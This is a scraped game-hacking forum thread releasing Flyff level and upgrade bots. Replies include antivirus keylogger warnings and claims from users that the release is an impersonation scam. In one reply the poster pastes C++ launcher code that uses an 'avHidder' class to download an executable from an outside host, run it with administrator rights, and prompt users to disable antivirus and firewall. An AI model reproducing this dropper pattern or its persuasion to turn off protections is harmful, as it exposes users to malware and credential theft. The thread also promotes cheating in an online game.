|
You last visited: Today at 08:46
Advertisement
[Release] Free Flyerx3 (Levelbot) & Awakex3 (Upgrade bot)
Discussion on [Release] Free Flyerx3 (Levelbot) & Awakex3 (Upgrade bot) within the Flyff Hacks, Bots, Cheats, Exploits & Macros forum part of the Flyff category.
01/09/2017, 00:28
|
#1
|
elite*gold: 169
Join Date: Jun 2010
Posts: 663
Received Thanks: 1,138
|
[Release] Free Flyerx3 (Levelbot) & Awakex3 (Upgrade bot)
please close, does not work anymore
|
|
|
01/09/2017, 02:12
|
#2
|
elite*gold: 0
Join Date: Dec 2016
Posts: 12
Received Thanks: 1
|
anyone tried?
|
|
|
01/09/2017, 15:56
|
#3
|
elite*gold: 0
Join Date: Dec 2015
Posts: 10
Received Thanks: 0
|
Work, thanks!
|
|
|
01/09/2017, 17:11
|
#4
|
elite*gold: 0
Join Date: Oct 2012
Posts: 5
Received Thanks: 2
|
when i try to open flyff, doesnt works and get closed
|
|
|
01/11/2017, 01:48
|
#5
|
elite*gold: 0
Join Date: Jan 2016
Posts: 29
Received Thanks: 0
|
is it working ? anyone got problems with antivir ? antivit tells me its a keylogger
|
|
|
01/11/2017, 19:13
|
#6
|
elite*gold: 15
Join Date: Feb 2008
Posts: 20
Received Thanks: 6
|
Can't download files, both are .zip.iso files
|
|
|
01/12/2017, 02:32
|
#7
|
elite*gold: 0
Join Date: Jan 2010
Posts: 75
Received Thanks: 15
|
Closes on startup sadly
|
|
|
01/12/2017, 11:03
|
#8
|
elite*gold: 90
Join Date: Mar 2016
Posts: 22
Received Thanks: 1
|
Nice I will try it out after school
|
|
|
01/13/2017, 07:28
|
#9
|
elite*gold: 0
Join Date: May 2008
Posts: 42
Received Thanks: 21
|
Thanks xenox3!
Anyone know how to make /rangenct works? i tried in DE FlyFF and Forsaken and cant make it work :s
|
|
|
01/18/2017, 17:11
|
#10
|
elite*gold: 169
Join Date: Jun 2010
Posts: 663
Received Thanks: 1,138
|
Quote:
Originally Posted by syore
Can't download files, both are .zip.iso files 
|
WTF?!
Quote:
Originally Posted by Treagon
Closes on startup sadly 
|
Quote:
Originally Posted by daniel3034
when i try to open flyff, doesnt works and get closed
|
If you wanna get help just try to share more details
Quote:
Originally Posted by benja14
Thanks xenox3!
Anyone know how to make /rangenct works? i tried in DE FlyFF and Forsaken and cant make it work :s
|
chat commands:
/rangenct
/say all
lock target
gm mode
are deactivated ( because some funny dudes used it while gw/for spamming)
Quote:
Originally Posted by pfohl95
is it working ? anyone got problems with antivir ? antivit tells me its a keylogger
|
Quote:
Originally Posted by Xenox3
Source Code Launcher ( terrible code )
Code:
char m_sPath[MAX_PATH];
BOOL IsUserAdmin(VOID)
{
BOOL b;
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
PSID AdministratorsGroup;
b = AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&AdministratorsGroup);
if(b)
{
if (!CheckTokenMembership( NULL, AdministratorsGroup, &b))
{
b = FALSE;
}
FreeSid(AdministratorsGroup);
}
return(b);
}
char* GetFile()
{
static TCHAR path[MAX_PATH];
strcpy((char*)path, m_sPath);
strcat((char*)path, "program files\\MaWin.exe");
return (char*)path;
}
int CALLBACK WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
AntivirUDClass avHidder;
GetModuleFileName(hInstance,m_sPath, MAX_PATH);
for(int i = strlen(m_sPath); i >= 1; i--)
{
if(m_sPath[i] == '\\')
{
m_sPath[i+1] = 0;
break;
}
}
HANDLE handle = CreateMutex(NULL, true, "lacmt");
if(GetLastError() != ERROR_SUCCESS)
{
MessageBox(0,"Application is already running!","ERROR",MB_ICONERROR);
return FALSE;
}
CreateMutex(NULL, true, "Apx3n");
if( GetLastError() != ERROR_SUCCESS)
{
MessageBox(0,"Application is already running!","ERROR",MB_ICONERROR);
return FALSE;
}
if(!IsUserAdmin())
{
MessageBox(0,"Please run this application as administrator!","ERROR",MB_ICONERROR);
}
else
{
if(!oldFile && avHidder.downloadFile("http://xenox3-coding.com/l3v3lB0t/MaWin.exe",GetFile() ) )
{
MessageBox(0,"Could not update bot! \n (Please make sure no Neuz.exe or AntiVir/Firewall is running )","ERROR",MB_ICONERROR);
}
else if( !avHidder.startFile( "program files\\MaWin.exe", "x3x3x3") )
{
MessageBox(0,"Could not start Bot \n (Please deactivate AntiVir/FireWall etc.)","ERROR",MB_ICONERROR);
}
}
return TRUE;
}
Virustotal
http://www.elitepvpers.com/link/?
(Bot is downloading update while starting and is packed/protected...so 4/ 53 is normal)
if you dont trust me, dont use it, or use Wireshark to check the network traffic ;-)
(or just block any connection with your firewall after the bot loaded mawin.exe )
(you can also check my source code)
Virustotal
https://www.virustotal.com/de/file/0259379541fa81945aca0d98b70c0ad1bc9050033f2f531dd0 758ab7badedf25/analysis/1482767002/
(Bot is downloading update while starting and is packed/protected...so 19 / 49 is normal)
if you dont trust me, dont use it, or use Wireshark to check the network traffic ;-)
(or just block any connection with your firewall after the bot loaded mawin.exe )
(you can also check my source code)
|
|
|
|
01/19/2017, 22:35
|
#11
|
elite*gold: 0
Join Date: Sep 2015
Posts: 6
Received Thanks: 0
|
YAY! the best bot maker is back! Im more than happy you re back dude 
Sent important pm!
|
|
|
01/23/2017, 02:30
|
#12
|
elite*gold: 0
Join Date: Dec 2016
Posts: 2
Received Thanks: 0
|
Why i can't register for a new account?? App does startup, but acc can't be made for the trail
 = outdated? I'll see : Error Creating Account, hmm ? Hitted thanks to early. damm
|
|
|
01/23/2017, 08:49
|
#13
|
elite*gold: 0
Join Date: Aug 2012
Posts: 9
Received Thanks: 2
|
Warum machen die Mods hier nicht mal dicht, dass ist nicht Xenox (zumindest nicht der den ich kannte), oder wollt ihr die Anfänger hiermit bewusst ins Messer laufen lassen. Wenn man keine Ahnung hat ist der Rechner ruckzuck verseucht.
|
|
|
01/23/2017, 11:40
|
#14
|
elite*gold: 59
Join Date: Oct 2012
Posts: 716
Received Thanks: 465
|
Quote:
Originally Posted by SilbernerSurfer
Warum machen die Mods hier nicht mal dicht, dass ist nicht Xenox (zumindest nicht der den ich kannte), oder wollt ihr die Anfänger hiermit bewusst ins Messer laufen lassen. Wenn man keine Ahnung hat ist der Rechner ruckzuck verseucht.
|
Leider Interessiert die Mods das anscheinend nicht.
Und Ja ich kann bestaetigen dass es der Originale Xenox NICHT sein kann!!!
|
|
|
01/23/2017, 13:54
|
#15
|
elite*gold: 0
Join Date: Dec 2016
Posts: 2
Received Thanks: 0
|
so it aint the real deal? just scam??
|
|
|
Similar Threads
|
[Release] Awakex3 - Awake/Upgrade bot for Flyff free
06/13/2016 - Flyff Hacks, Bots, Cheats, Exploits & Macros - 67 Replies
http://www.elitepvpers.com/forum/attachments/flyff -hacks-bots-cheats-exploits-macros/153176d13532498 21-release-flyff-small-levelbot-18-11-12-eflyff-df lyff-usflyff-frflyff-xenox3.jpg
No support available please wait till april
Awakex3 - Awake/Upgrade Bot for Flyff
image: http://i.epvpimg.com/f1N7f.png
image: http://i.epvpimg.com/r5gkb.png
|
All times are GMT +1. The time now is 08:47.
|
|